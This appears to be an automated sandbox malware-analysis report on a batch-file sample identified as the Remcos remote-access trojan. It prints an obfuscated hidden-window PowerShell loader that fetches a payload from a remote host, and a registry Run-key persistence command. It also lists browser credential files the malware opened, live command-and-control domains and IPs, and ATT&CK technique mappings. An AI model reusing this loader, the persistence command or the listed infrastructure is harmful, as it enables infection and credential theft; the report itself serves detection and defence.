                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. 
DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe", taking as its argument the obfuscated script from the cmd.exe entry above, in lowercase
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 15_2_0041881C
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 16_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041739B GetVersionExW, 15_2_0041739B
                Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
                Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 16_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 16_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 16_2_00402DB3
                Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 2960, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I42HQ2
                Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
                Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 12 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 12 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 11 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 22 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 412 Process Injection | 1 Software Packing | 1 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 11 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 18 System Information Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 21 Security Software Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                [Figure: Behavior Graph. ID: 1540333, Sample: ZW_PCCE-010023024001.bat, Startdate: 23/10/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| ZW_PCCE-010023024001.bat | 8% | ReversingLabs | | |

                No Antivirus matches
                No Antivirus matches
                No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://www.imvu.comr | 0% | URL Reputation | safe | |
| http://crl.microsoft | 0% | URL Reputation | safe | |
| https://contoso.com/License | 0% | URL Reputation | safe | |
| https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe | |
| https://aka.ms/pscore6lB | 0% | URL Reputation | safe | |
| https://contoso.com/ | 0% | URL Reputation | safe | |
| https://nuget.org/nuget.exe | 0% | URL Reputation | safe | |
| https://login.yahoo.com/config/login | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | |
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | |
| https://go.micro | 0% | URL Reputation | safe | |
| http://www.imvu.com | 0% | URL Reputation | safe | |
| https://contoso.com/Icon | 0% | URL Reputation | safe | |
| http://geoplugin.net/json.gp | 0% | URL Reputation | safe | |
| https://aka.ms/pscore68 | 0% | URL Reputation | safe | |
| http://www.ebuddy.com | 0% | URL Reputation | safe | |

                NameIPActiveMaliciousAntivirus DetectionReputation
                ethys.ro
                81.180.144.124
                truefalse
                  unknown
                  rj0987654321.duckdns.org
                  193.187.91.212
                  truetrue
                    unknown
                    geoplugin.net
                    178.237.33.50
                    truefalse
                      unknown
                      s-part-0017.t-0009.fb-t-msedge.net
                      13.107.253.45
                      truefalse
                        unknown
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| rj0987654321.duckdns.org | true | | unknown |
| https://ethys.ro/Nonaddicting.qxd | false | | unknown |
| http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown |
| https://ethys.ro/3/tVWTkim99.bin | false | | unknown |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 193.187.91.212 | rj0987654321.duckdns.org | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | true |
| 81.180.144.124 | ethys.ro | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | false |
| 178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false |

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540333
Start date and time: 2024-10-23 17:21:40 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ZW_PCCE-010023024001.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winBAT@22/14@10/3
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 149
• Number of non-executed functions: 290
Cookbook Comments:
• Found application associated with file extension: .bat
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7344 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7580 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ZW_PCCE-010023024001.bat

| Time | Type | Description |
|---|---|---|
| 11:22:34 | API Interceptor | 88x Sleep call for process: powershell.exe modified |
| 11:23:48 | API Interceptor | 2967646x Sleep call for process: msiexec.exe modified |
| 16:23:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr) |
| 16:23:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr) |

                                                                                                  • 178.237.33.50
                                                                                                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  RCS-RDS73-75DrStaicoviciRO9wmt6bpcHr.elfGet hashmaliciousOkiruBrowse
                                                                                                  • 5.15.3.215
                                                                                                  byte.mips.elfGet hashmaliciousOkiruBrowse
                                                                                                  • 86.124.184.38
                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 81.18.69.62
                                                                                                  ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 79.115.119.253
                                                                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 81.196.115.42
                                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 81.196.36.149
                                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 79.116.71.85
                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 86.120.157.195
                                                                                                  la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 86.122.212.78
                                                                                                  arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 79.114.177.248
                                                                                                  ATOM86-ASATOM86NLSecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 178.237.33.50
                                                                                                  DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 85.222.236.220
                                                                                                  DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                  • 178.237.33.50
                                                                                                  OBE-EUROPEObenetworkEuropeSEOrder_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 185.157.163.135
                                                                                                  Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 193.187.91.214
                                                                                                  SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 193.187.91.216
                                                                                                  SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 193.187.91.216
                                                                                                  XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                  • 194.32.149.14
                                                                                                  bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 193.182.111.131
                                                                                                  z2PO20240815.pdf.lnkGet hashmaliciousXWormBrowse
                                                                                                  • 193.187.91.208
                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                  • 193.187.91.216
                                                                                                  https://www.canva.com/design/DAGLxvJi_b4/I2I9hVBC94poYJRY8neUTg/view?utm_content=DAGLxvJi_b4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 194.32.144.119
                                                                                                  REV-New Order 20240717^^^^^^^^^^^^^^^^^^.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                  • 193.187.91.208
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eDistribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  PO 202410-224.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  http://docusign.netGet hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  https://c4hbh789.caspio.com/dp/32a4e0002a1934bee62047dd94d1Get hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  http://wxqlb.ecobusinessegypt.com/4Upeae17759oIun1207nsacmhsouq29959VLTMIPDLABHITRZ3224VGST20749x12Get hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 81.180.144.124
                                                                                                  37f463bf4616ecd445d4a1937da06e19Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 81.180.144.124
                                                                                                  xxJfSec58P.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  UMrFwHyjUi.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  b157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                  • 81.180.144.124
                                                                                                  rMactation.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 81.180.144.124
                                                                                                  rMactation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 81.180.144.124
                                                                                                  No context
                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):288
                                                                                                  Entropy (8bit):3.3152173055146417
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:6ljnOJ5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lqec0WFe5BWFe5BW+
                                                                                                  MD5:5DA37269356F939F2FF658D66922B5F9
                                                                                                  SHA1:8D316D80B78ADD00C76289F16654AAEA03C52C0F
                                                                                                  SHA-256:E34E9DF7E1C79ECA68114ED54F98C7FBA1A9CB28EF00E6DDC741EF90E9B1D3AA
                                                                                                  SHA-512:4B22824493AC3F5BC23AD0147A2422F309CCFB85FF0AEDEA61C5830A08DA096BE4D64DC3F6806B0F391BE327C544D68626F69763A9E970CF96E995D54B378223
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                  Preview:....[.2.0.2.4./.1.0./.2.3. .1.1.:.2.3.:.1.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):957
                                                                                                  Entropy (8bit):5.008511330476407
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qUdRNuKyGX85jHf3SvXhNlT3/7YvfbYro:9PN0GX85mvhjTkvfEro
